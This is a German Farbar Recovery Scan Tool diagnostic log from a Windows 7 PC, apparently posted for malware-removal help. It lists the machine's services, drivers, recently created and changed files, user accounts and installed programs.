CHR Extension: (Google-Suche) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-08]
CHR Extension: (Google Tabellen) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-12-08]
CHR Extension: (Google Docs Offline) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-12-08]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-12-08]
CHR Extension: (Google Mail) - C:\Users\Özkan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-12-08]
==================== Dienste (Nicht auf der Ausnahmeliste) ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [669872 2015-09-15] (Adobe Systems Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2016448 2015-11-25] (Adobe Systems, Incorporated)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [448384 2014-08-15] ()
R2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [135824 2011-12-12] (Seiko Epson Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [161560 2012-02-08] (Intel Corporation)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
S3 Sony PC Companion; C:\Program Files (x86)\Sony\Sony PC Companion\PCCService.exe [155824 2013-02-04] (Avanquest Software) [Datei ist nicht signiert]
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [5491984 2015-05-20] (TeamViewer GmbH)
S3 ACTION_SVC; C:\Program Files (x86)\Mirillis\Action!\action_svc.exe [X]
S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
S2 Mobizen plugin; C:\Program Files (x86)\RSUPPORT\MobizenService\MobizenService.exe [X]
S3 MozillaMaintenance; "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" [X]
S2 Tender Switch; "C:\Program Files (x86)\Tender Switch\Tender Switch.exe" [X]
S3 TrustedInstaller; %SystemRoot%\servicing\TrustedInstaller.exe [X]
===================== Treiber (Nicht auf der Ausnahmeliste) ==========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
S3 AVEO; C:\Windows\System32\DRIVERS\AVEOdcnt.sys [305920 2011-10-24] (AVEO)
R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283200 2014-01-16] (DT Soft Ltd)
S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
S3 ggsomc; C:\Windows\System32\DRIVERS\ggsomc.sys [30424 2014-10-22] (Sony Mobile Communications)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2015-10-05] (Malwarebytes Corporation)
S3 smhwser; C:\Windows\System32\DRIVERS\smhwser.sys [122624 2010-02-04] (QUALCOMM Incorporated)
U5 UnlockerDriver5; C:\Program Files\Unlocker\UnlockerDriver5.sys [12352 2010-07-01] ()
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2014-07-28] (Apple, Inc.) [Datei ist nicht signiert]
S3 USBTINSP; C:\Windows\System32\DRIVERS\tinspusb.sys [142848 2010-03-29] (Texas Instruments)
S1 BdfNdisf; \??\c:\program files\common files\bitdefender\bitdefender firewall\bdfndisf6.sys [X]
S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
S3 X6va034; \??\C:\Windows\SysWOW64\Drivers\X6va034 [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]
S3 xspirit; \??\C:\Windows\xspirit.sys [X]
==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Ein Monat: Erstellte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2015-12-22 00:29 - 2015-12-22 00:29 - 00235373 _____ C:\ProgramData\1450740415.bdinstall.bin
2015-12-22 00:29 - 2015-12-22 00:29 - 00027576 _____ C:\ProgramData\1450740559.bdinstall.bin
2015-12-22 00:29 - 2015-12-22 00:29 - 00000505 _____ C:\Users\Özkan\Desktop\mbam.txt
2015-12-21 23:26 - 2015-12-22 00:27 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-12-21 23:26 - 2015-12-22 00:23 - 00001096 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-12-21 23:26 - 2015-12-21 23:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-12-21 23:25 - 2015-12-21 23:25 - 00000000 ____D C:\ProgramData\Malwarebytes
2015-12-21 23:25 - 2015-12-21 23:25 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-12-21 23:25 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-12-21 23:25 - 2015-10-05 09:50 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2015-12-21 23:25 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2015-12-21 23:14 - 2015-12-21 23:18 - 00000000 ____D C:\AdwCleaner
2015-12-21 22:52 - 2015-12-22 01:23 - 00000000 ____D C:\FRST
2015-12-21 20:17 - 2015-09-17 21:24 - 00282000 _____ (BitDefender) C:\Windows\system32\Drivers\avchv.sys
2015-12-21 20:11 - 2015-12-22 00:29 - 00000000 ____D C:\Program Files\Bitdefender Agent
2015-12-21 12:32 - 2015-12-21 23:12 - 00002651 _____ C:\Users\Özkan\Desktop\Neues Textdokument.txt
2015-12-19 22:03 - 2005-03-18 17:19 - 02337488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_25.dll
2015-12-19 09:34 - 2015-12-19 09:34 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Fraps
2015-12-18 22:14 - 2015-12-18 22:14 - 00001037 _____ C:\Users\Özkan\Documents\R50234.txt
2015-12-18 19:46 - 2015-12-18 19:46 - 00000000 ____D C:\Users\Özkan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client
2015-12-18 19:36 - 2015-12-22 00:36 - 00000000 ____D C:\Program Files (x86)\Steam
2015-12-18 19:36 - 2015-12-19 18:49 - 00000000 ____D C:\Users\Özkan\Desktop\Bewerbungen Etc
2015-12-18 19:36 - 2015-12-18 19:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2015-12-17 20:05 - 2015-12-17 20:05 - 00019336 _____ C:\Windows\System32\Tasks\{28325A84-A9DE-5181-98DC-72E8BE19248C}
2015-12-09 20:18 - 2015-12-09 20:18 - 00000000 ____D C:\ProgramData\Bitdefender Agent
2015-12-08 21:35 - 2015-12-22 00:23 - 00001141 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2015-12-08 21:34 - 2015-12-08 21:35 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2015-12-08 21:33 - 2015-12-08 21:33 - 00000000 ____D C:\Windows\System32\Tasks\AVAST Software
2015-12-08 21:33 - 2015-12-08 21:33 - 00000000 ____D C:\Program Files\Common Files\AV
2015-12-08 21:30 - 2015-12-09 15:05 - 00000000 ____D C:\ProgramData\AVAST Software
2015-12-08 21:09 - 2015-12-22 01:20 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-12-08 21:09 - 2015-12-22 00:32 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-12-08 21:09 - 2015-12-08 21:15 - 00004106 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2015-12-08 21:09 - 2015-12-08 21:15 - 00003854 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2015-12-08 13:43 - 2015-12-08 13:43 - 00000000 ____D C:\ProgramData\{30aa3bf1-20c8-0}
2015-12-08 13:43 - 2015-12-08 13:43 - 00000000 ____D C:\ProgramData\{029b1f57-60c8-1}
2015-12-04 21:54 - 2015-12-07 15:23 - 00000000 ____D C:\Users\Özkan\Documents\AnotherLife-Keybinder
2015-12-04 17:45 - 2015-12-04 17:47 - 00000000 ____D C:\Program Files\Microsoft Office
2015-11-25 21:06 - 2015-11-25 21:06 - 00000000 ____D C:\Users\Özkan\Documents\Razer
==================== Ein Monat: Geänderte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2015-12-22 00:38 - 2013-07-29 20:28 - 00000884 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-12-22 00:37 - 2009-07-14 05:45 - 00020480 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-12-22 00:37 - 2009-07-14 05:45 - 00020480 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-12-22 00:33 - 2014-01-16 14:09 - 00000000 ____D C:\Users\Özkan\AppData\Local\ElevatedDiagnostics
2015-12-22 00:33 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\system32\NDF
2015-12-22 00:28 - 2014-01-20 19:03 - 00000000 ____D C:\ProgramData\Bitdefender
2015-12-22 00:28 - 2014-01-20 19:02 - 00000000 ____D C:\Program Files\Common Files\Bitdefender
2015-12-22 00:27 - 2014-11-09 22:57 - 00145397 _____ C:\bdlog.txt
2015-12-22 00:27 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\inf
2015-12-22 00:23 - 2015-10-06 17:25 - 00001147 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2015-12-22 00:23 - 2015-10-01 18:36 - 00001209 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk
2015-12-22 00:23 - 2015-05-23 17:29 - 00001031 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 10.lnk
2015-12-22 00:23 - 2014-07-17 14:36 - 00001293 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Movie Maker.lnk
2015-12-22 00:23 - 2014-07-17 14:35 - 00001362 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Photo Gallery.lnk
2015-12-22 00:23 - 2014-01-19 16:21 - 00000924 _____ C:\Users\Public\Desktop\EPSON Scan.lnk
2015-12-22 00:23 - 2013-07-29 20:05 - 00000860 _____ C:\Users\Public\Desktop\CCleaner.lnk
2015-12-22 00:23 - 2013-07-29 19:23 - 00001333 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Media Center.lnk
2015-12-22 00:23 - 2013-07-29 19:23 - 00001314 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows DVD Maker.lnk
2015-12-22 00:23 - 2009-07-14 05:57 - 00001511 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2015-12-22 00:23 - 2009-07-14 05:57 - 00001292 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sidebar.lnk
2015-12-22 00:23 - 2009-07-14 05:57 - 00001234 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XPS Viewer.lnk
2015-12-22 00:23 - 2009-07-14 05:54 - 00001198 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Fax and Scan.lnk
2015-12-22 00:22 - 2014-11-09 22:33 - 00002073 _____ C:\ProgramData\Microsoft\Windows\Start Menu\GetDataBack for NTFS.lnk
2015-12-22 00:22 - 2014-02-16 20:27 - 00001421 _____ C:\Users\Özkan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2015-12-22 00:22 - 2013-12-23 19:37 - 00000436 _____ C:\Windows\system32\Drivers\etc\hosts.ics
2015-12-22 00:22 - 2013-11-24 20:17 - 00000355 _____ C:\Users\Özkan\Desktop\Computer.lnk
2015-12-22 00:22 - 2009-07-14 06:01 - 00001218 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Default Programs.lnk
2015-12-22 00:22 - 2009-07-14 05:49 - 00001246 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk
2015-12-22 00:21 - 2009-07-14 06:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-12-22 00:14 - 2013-08-11 13:13 - 00000000 ____D C:\Users\Özkan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Games
2015-12-21 23:18 - 2013-07-29 19:30 - 00000000 ____D C:\Users\Özkan
2015-12-21 23:18 - 2009-07-14 04:20 - 00000000 ____D C:\Windows
2015-12-21 23:09 - 2014-09-30 16:38 - 01068032 ___SH C:\Users\Özkan\Desktop\Thumbs.db
2015-12-21 20:14 - 2015-08-25 07:55 - 00000000 ____D C:\Program Files\Bitdefender
2015-12-21 13:59 - 2015-06-06 05:04 - 00000000 ____D C:\Users\Özkan\AppData\Local\CrashDumps
2015-12-19 21:10 - 2014-08-18 15:45 - 00000000 ____D C:\Users\Özkan\AppData\Roaming\.minecraft
2015-12-19 09:34 - 2015-10-05 22:17 - 00000000 ____D C:\Fraps
2015-12-19 08:12 - 2014-03-27 18:54 - 00000000 ____D C:\Program Files (x86)\TeamViewer
2015-12-18 19:46 - 2015-06-15 13:20 - 00000000 ____D C:\Users\Özkan\AppData\Local\TeamSpeak 3 Client
2015-12-18 19:14 - 2014-04-26 15:58 - 00000000 ____D C:\ProgramData\Origin
2015-12-18 19:13 - 2015-08-15 06:58 - 00000000 ____D C:\Program Files (x86)\Warlord II
2015-12-15 13:59 - 2009-07-14 06:08 - 00032632 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2015-12-13 13:02 - 2015-10-08 12:54 - 00000000 ____D C:\Users\Ă–zkan\AppData\Local\Steam
2015-12-10 17:16 - 2014-02-18 15:55 - 00000000 ____D C:\temp
2015-12-10 16:26 - 2015-08-15 06:31 - 00000000 ____D C:\Program Files (x86)\SmoothScroll
2015-12-10 16:23 - 2009-07-14 18:58 - 00704504 _____ C:\Windows\system32\perfh007.dat
2015-12-10 16:23 - 2009-07-14 18:58 - 00152310 _____ C:\Windows\system32\perfc007.dat
2015-12-10 16:23 - 2009-07-14 06:13 - 01634288 _____ C:\Windows\system32\PerfStringBackup.INI
2015-12-09 16:38 - 2013-07-29 20:28 - 00796864 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-12-09 16:38 - 2013-07-29 20:28 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-12-09 16:38 - 2013-07-29 20:28 - 00003822 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2015-12-09 13:53 - 2015-08-25 18:56 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2015-12-08 21:25 - 2015-11-15 16:49 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mirillis
2015-12-08 21:25 - 2015-11-15 16:49 - 00000000 ____D C:\Program Files (x86)\Mirillis
2015-12-08 21:25 - 2015-10-03 08:31 - 00000000 ____D C:\Program Files (x86)\AnotherLifeClient
2015-12-08 20:57 - 2009-07-14 06:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2015-11-25 23:53 - 2015-09-16 16:42 - 00000000 ____D C:\Program Files (x86)\Razer
2015-11-25 21:50 - 2014-08-23 22:55 - 00035328 ___SH C:\Users\Özkan\Thumbs.db
2015-11-25 21:47 - 2014-01-26 13:08 - 00000000 ____D C:\Users\Özkan\AppData\Local\Razer
2015-11-25 21:47 - 2014-01-26 13:07 - 00000000 ____D C:\ProgramData\Razer
2015-11-25 21:09 - 2014-01-30 20:07 - 00000000 ____D C:\Users\Özkan\AppData\Roaming\TeamViewer
2015-11-25 20:08 - 2015-09-08 11:49 - 00000000 ____D C:\Users\Özkan\Documents\Files
==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======
2013-12-11 15:57 - 2013-12-11 15:57 - 2791563 _____ () C:\Program Files\oodr.chm
2013-12-11 18:58 - 2013-12-11 18:58 - 1755432 _____ (O&O Software GmbH) C:\Program Files\oodrrs.dll
2013-12-11 18:58 - 2013-12-11 18:58 - 3407656 _____ (O&O Software GmbH) C:\Program Files\oodrsurs.dll
2013-12-11 18:58 - 2013-12-11 18:58 - 6164264 _____ (O&O Software GmbH) C:\Program Files\oodskrec.exe
2013-10-09 14:22 - 2013-10-09 14:22 - 1016624 _____ (O&O Software GmbH) C:\Program Files\ooliveupdate.exe
2013-12-10 15:46 - 2013-12-10 15:46 - 6562600 _____ (O&O Software GmbH) C:\Program Files\oorwiz3.dll
2013-12-10 15:46 - 2013-12-10 15:46 - 0164136 _____ (O&O Software GmbH) C:\Program Files\oorwiz3r.dll
2013-12-10 15:46 - 2013-12-10 15:46 - 4554536 _____ (O&O Software GmbH) C:\Program Files\oosu.dll
2013-12-11 18:58 - 2013-12-11 18:58 - 4900648 _____ (O&O Software GmbH) C:\Program Files\ooviewer.dll
2013-12-11 16:06 - 2013-12-11 16:06 - 0001755 _____ () C:\Program Files\readme.txt
2015-11-07 17:58 - 2015-11-07 18:02 - 6420480 _____ () C:\Program Files (x86)\GUT87EA.tmp
2015-06-24 19:34 - 2015-06-26 22:40 - 0000079 _____ () C:\Program Files (x86)\prefs.js
2015-07-22 12:45 - 2015-08-14 14:53 - 0000020 _____ () C:\Users\Özkan\AppData\Roaming\appdataFr2.bin
2015-08-15 06:29 - 2015-08-25 07:48 - 0000024 _____ () C:\Users\Özkan\AppData\Roaming\appdataFr25.bin
2014-07-08 18:34 - 2014-07-08 18:34 - 0000000 ___SH () C:\Users\Özkan\AppData\Local\LumaEmu
2015-06-27 12:06 - 2015-06-27 12:06 - 0000000 _____ () C:\Users\Özkan\AppData\Local\Temp.dat
2015-12-22 00:29 - 2015-12-22 00:29 - 0235373 _____ () C:\ProgramData\1450740415.bdinstall.bin
2015-12-22 00:29 - 2015-12-22 00:29 - 0027576 _____ () C:\ProgramData\1450740559.bdinstall.bin
2015-08-14 20:57 - 2015-08-14 20:57 - 0000006 __RSH () C:\ProgramData\37d3abf93dbe04b7eb83987cae627f61c2b48eeb
Einige Dateien in TEMP:
====================
C:\Users\Özkan\AppData\Local\Temp\sqlite3.dll
==================== Bamital & volsnap =================
(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
C:\Windows\system32\winlogon.exe => Datei ist digital signiert
C:\Windows\system32\wininit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\wininit.exe => Datei ist digital signiert
C:\Windows\explorer.exe => Datei ist digital signiert
C:\Windows\SysWOW64\explorer.exe => Datei ist digital signiert
C:\Windows\system32\svchost.exe => Datei ist digital signiert
C:\Windows\SysWOW64\svchost.exe => Datei ist digital signiert
C:\Windows\system32\services.exe => Datei ist digital signiert
C:\Windows\system32\User32.dll => Datei ist digital signiert
C:\Windows\SysWOW64\User32.dll => Datei ist digital signiert
C:\Windows\system32\userinit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\userinit.exe => Datei ist digital signiert
C:\Windows\system32\rpcss.dll => Datei ist digital signiert
C:\Windows\system32\dnsapi.dll => Datei ist digital signiert
C:\Windows\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert
LastRegBack: 2015-12-19 19:57
==================== Ende von FRST.txt ============================ Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:20-12-2015
durchgeführt von Özkan (2015-12-22 01:24:13)
Gestartet von C:\Users\Özkan\Documents\logs\Downloads
Windows 7 Ultimate Service Pack 1 (X64) (2013-07-29 18:30:24)
Start-Modus: Normal
==========================================================
==================== Konten: =============================
Administrator (S-1-5-21-1539430812-113463742-2149372525-500 - Administrator - Disabled)
Gast (S-1-5-21-1539430812-113463742-2149372525-501 - Limited - Disabled) => C:\Users\Gast.EasyNote
HomeGroupUser$ (S-1-5-21-1539430812-113463742-2149372525-1010 - Limited - Enabled)
Özkan (S-1-5-21-1539430812-113463742-2149372525-1000 - Administrator - Enabled) => C:\Users\Özkan
==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
Adobe Flash Player 20 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 20.0.0.228 - Adobe Systems Incorporated)
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.235 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.3.133 - Adobe Systems, Inc.)
Broadcom Card Reader Driver Installer (HKLM\...\{4710662C-8204-4334-A977-B1AC9E547819}) (Version: 15.0.7.3 - Broadcom Corporation)
Broadcom NetLink Controller (HKLM\...\{C91DCB72-F5BB-410D-A91A-314F5D1B4284}) (Version: 15.0.7.1 - Broadcom Corporation)
CCleaner (HKLM\...\CCleaner) (Version: 4.04 - Piriform)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version: - Valve)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Druckerdeinstallation für EPSON WF-2540 Series (HKLM\...\EPSON WF-2540 Series) (Version: - SEIKO EPSON Corporation)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version: - Seiko Epson Corporation)
ETDWare PS/2-X64 10.6.9.9_WHQL (HKLM\...\Elantech) (Version: 10.6.9.9 - ELAN Microelectronic Corp.)
Fotogalerie (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Fraps (HKLM-x32\...\Fraps) (Version: - )
GetDataBack for NTFS (HKLM-x32\...\{56582EEA-3AEF-4D84-8B9D-C87A3CD9250F}) (Version: 4.32.000 - Runtime Software)
Google Update Helper (x32 Version: 1.3.28.15 - Google Inc.) Hidden
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.0.2.1410 - Intel Corporation)
Intel(R) OpenCL CPU Runtime (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2712 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.1.0.1006 - Intel Corporation)
Intel® Trusted Connect Service Client (HKLM\...\{09536BA1-E498-4CC3-B834-D884A67D7E34}) (Version: 1.23.605.1 - Intel Corporation)
Java 7 Update 55 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86417055FF}) (Version: 7.0.550 - Oracle)
Java 7 Update 67 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217055FF}) (Version: 7.0.670 - Oracle)
Launch Manager (HKLM-x32\...\LManager) (Version: 5.1.15 - Packard Bell)
Malwarebytes Anti-Malware Version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
Microsoft .NET Framework 4.5.1 (Deutsch) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{929CE49F-1CA7-4CF3-A9A1-6D757443C63F}) (Version: 1.2.0241 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Microsoft-Maus- und Tastatur-Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 2.2.173.0 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 42.0 (x86 de) (HKLM-x32\...\Mozilla Firefox 42.0 (x86 de)) (Version: 42.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 42.0 - Mozilla)
Qualcomm Atheros WiFi Driver Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 3.0 - Qualcomm Atheros)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6543 - Realtek Semiconductor Corp.)
Sony Mobile Update Engine (HKLM-x32\...\Update Engine) (Version: 2.14.14.201410081526 - Sony Mobile Communications AB)
